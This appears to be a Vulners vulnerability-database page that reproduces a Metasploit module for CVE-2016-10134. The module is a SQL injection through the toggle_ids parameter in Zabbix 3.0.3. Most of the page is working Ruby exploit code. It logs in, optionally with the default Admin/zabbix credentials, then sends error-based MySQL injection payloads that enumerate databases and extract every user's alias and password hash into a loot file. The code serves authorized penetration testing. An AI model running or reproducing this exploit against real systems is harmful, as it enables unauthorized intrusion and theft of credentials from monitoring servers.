Lucene search
K

Zabbix toggle_ids SQL Injection

🗓️ 22 Aug 2016 23:52:16Reported by 1n3 <[email protected]>, bperryType 
metasploit
 metasploit
🔗 www.rapid7.com👁 36 Views

Zabbix toggle_ids SQL Injection. Exploits SQL injection in Zabbix 3.0.3 to extract usernames and password hashes

Related
Code
ReporterTitlePublishedViews
Family
Gitee
Exploit for SQL Injection in Zabbix
15 Apr 202120:29
gitee
Gitee
Exploit for SQL Injection in Zabbix
8 Jun 202121:12
gitee
Gitee
Exploit for SQL Injection in Zabbix
20 Mar 202216:48
gitee
Gitee
Exploit for SQL Injection in Zabbix
24 Nov 202219:58
gitee
Gitee
Exploit for SQL Injection in Zabbix
18 Feb 202314:38
gitee
Gitee
Exploit for SQL Injection in Zabbix
22 Jan 202112:57
gitee
Gitee
Exploit for SQL Injection in Zabbix
8 Apr 202211:20
gitee
Gitee
Exploit for SQL Injection in Zabbix
16 May 202115:40
gitee
Gitee
Exploit for SQL Injection in Zabbix
20 Mar 202115:17
gitee
Gitee
Exploit for SQL Injection in Zabbix
6 Jul 202113:18
gitee
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zabbix toggle_ids SQL Injection',
      'Description'    => %q{
      This module will exploit a SQL injection in Zabbix 3.0.3 and
      likely prior in order to save the current usernames and
      password hashes from the database to a JSON file.
      },
      'References'     =>
        [
          ['CVE', '2016-10134'],
          ['URL', 'https://seclists.org/fulldisclosure/2016/Aug/60']
        ],
      'Author'         =>
        [
          '[email protected]', #discovery
          'bperry' #module
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2016-08-11'
    ))

    register_options(
      [
        OptBool.new('REQUIREAUTH', [true, 'Enforce authentication', false]),
        OptString.new('USERNAME', [false, 'The username to authenticate with', 'Admin']),
        OptString.new('PASSWORD', [false, 'The password to authenticate with', 'zabbix']),
        OptString.new('TARGETURI', [true, 'The relative URI for Zabbix', '/zabbix'])
      ])
  end

  def check

    sid, cookies = authenticate

    left_marker = Rex::Text.rand_text_alpha(5)
    right_marker = Rex::Text.rand_text_alpha(5)
    flag = Rex::Text.rand_text_alpha(5)

    query = "AND (SELECT 1256 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
    query << ",(SELECT MID((IFNULL(CAST(0x#{flag.unpack("H*")[0]} AS CHAR),0x20)),1,54)"
    query << " FROM dual LIMIT 0,1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
    query << ' INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

    res = make_injected_request(query, sid, cookies)

    unless res and res.body
      return Msf::Exploit::CheckCode::Safe
    end

    match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

    unless match
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    if match[1] == flag
      return Msf::Exploit::CheckCode::Vulnerable
    end

    Msf::Exploit::CheckCode::Safe
  end

  def run
    sid, cookies = authenticate

    left_marker = Rex::Text.rand_text_alpha(5)
    right_marker = Rex::Text.rand_text_alpha(5)

    query = " AND (SELECT 5361 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
    query << ",(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM"
    query << " INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x"
    query << " FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

    res = make_injected_request(query, sid, cookies)

    unless res and res.body
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

    unless match
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    count = match[1].to_i

    dbs = []
    0.upto(count-1) do |cur|

      get_dbs = " AND (SELECT 5184 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
      get_dbs << ",(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54)"
      get_dbs << " FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]},"
      get_dbs << "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

      res = make_injected_request(get_dbs, sid, cookies)

      unless res and res.body
        fail_with(Failure::Unknown, 'Server did not respond in an expected way')
      end

      match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

      unless match
        fail_with(Failure::Unknown, 'Server did not respond in an expected way')
      end

      dbs << match[1]
    end

    dbs.delete("mysql")
    dbs.delete("performance_schema")
    dbs.delete("information_schema")

    users = []
    dbs.each do |db|
      cols = ["alias", "passwd"]

      user_count = " AND (SELECT 6262 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
      user_count << ",(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM"
      user_count << " #{db}.users),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
      user_count << " INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

      res = make_injected_request(user_count, sid, cookies)

      unless res and res.body
        fail_with(Failure::Unknown, 'Server did not respond in an expected way')
      end

      match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

      unless match
        fail_with(Failure::Unknown, 'Server did not respond in an expected way')
      end

      count = match[1].to_i

      0.upto(count-1) do |cur|
        user = {}
        cols.each do |col|
          get_col = " AND (SELECT 6334 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
          get_col << ",(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),1,54)"
          get_col << " FROM #{db}.users ORDER BY alias LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]}"
          get_col << ',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

          res = make_injected_request(get_col, sid, cookies)

          unless res and res.body
            fail_with(Failure::Unknown, 'Server did not respond in an expected way')
          end

          match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

          unless match
            fail_with(Failure::Unknown, 'Server did not respond in an expected way')
          end

          user[col] = match[1]
        end
        users << user
      end
    end

    loot = store_loot("zabbixusers.json","text/plain", rhost, users.to_json)

    print_good('Users and password hashes stored at ' + loot)

  end

  def authenticate
   res = send_request_cgi({
     'uri' => normalize_uri(target_uri.path, 'index.php')
   })

   unless res and res.body
     fail_with(Failure::Unknown, 'Server did not respond in an expected way')
   end

   cookies = res.get_cookies

   match = /name="sid" value="(.*?)">/.match(res.body)

   unless match
     fail_with(Failure::Unknown, 'Server did not respond in an expected way')
   end

   sid = match[1]

   if datastore['REQUIREAUTH']

     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',
       'vars_post' => {
         'sid' => sid,
         'form_refresh' => 1,
         'name' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
         'autologin' => 1,
         'enter' => 'Sign in'
       },
       'cookie' => cookies
     })

     unless res
       fail_with(Failure::Unknown, 'Server did not respond in an expected way')
     end

     if res.code == 302
       cookies = res.get_cookies

       res = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, 'latest.php'),
         'vars_get' => {
          'ddreset' => '1'
         },
         'cookies' => cookies
       })

       unless res and res.body
         fail_with(Failure::Unknown, 'Server did not respond in an expected way')
       end

       cookies = res.get_cookies
       match = /name="sid" value="(.*?)">/.match(res.body)

       unless match
         fail_with(Failure::Unknown, 'Server did not respond in an expected way')
       end

       sid = match[1]
     elsif
       fail_with(Failure::Unknown, 'Server did not respond in an expected way')
     end
   end

   return sid, cookies
  end

  def make_injected_request(sql, sid, cookies)
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'latest.php'),
      'method' => 'POST',
      'vars_get' => {
        'output' => 'ajax',
        'sid' => sid
      },
      'vars_post' => {
        'favobj' => 'toggle',
        'toggle_ids[]' => '348 ' + sql,
        'toggle_open_state' => 0
      },
      'cookie' => cookies
    })
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Apr 2021 11:12Current
0.7Low risk
Vulners AI Score0.7
CVSS 27.5
CVSS 39.8
EPSS0.83284
36